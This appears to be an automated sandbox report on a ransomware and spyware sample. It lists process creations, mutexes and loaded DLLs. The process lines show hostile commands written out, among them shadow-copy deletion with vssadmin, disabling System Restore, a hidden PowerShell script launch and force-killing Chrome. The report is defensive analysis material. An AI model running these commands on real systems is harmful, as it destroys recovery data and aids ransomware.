Source: _overlapped.pyd.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: zlib1.dll.7.dr	Static PE information: Number of sections : 12 > 10
Source: zlib1.dll.6.dr	Static PE information: Number of sections : 12 > 10

Source: python3.dll.6.dr	Static PE information: No import functions for PE file found
Source: python3.dll.7.dr	Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal100.rans.spyw.evad.winPS1@36/2334@2/2

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Code function: 34_2_00007FFD8A19C090 GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,_Py_BuildValue_SizeT,LocalFree,PyErr_SetObject,_Py_Dealloc,

34_2_00007FFD8A19C090

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\gogjothegoat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_httofq1n.fnk.ps1

Jump to behavior

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: zed.exe	String found in binary or memory: -startline must be less than or equal to -endline
Source: zed.exe	String found in binary or memory: -help

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
Source: unknown	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Windows\System32\vssadmin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Windows\System32\vssadmin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: tcl86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: tk86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: netapi32.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: zlib1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: logoncli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: samcli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
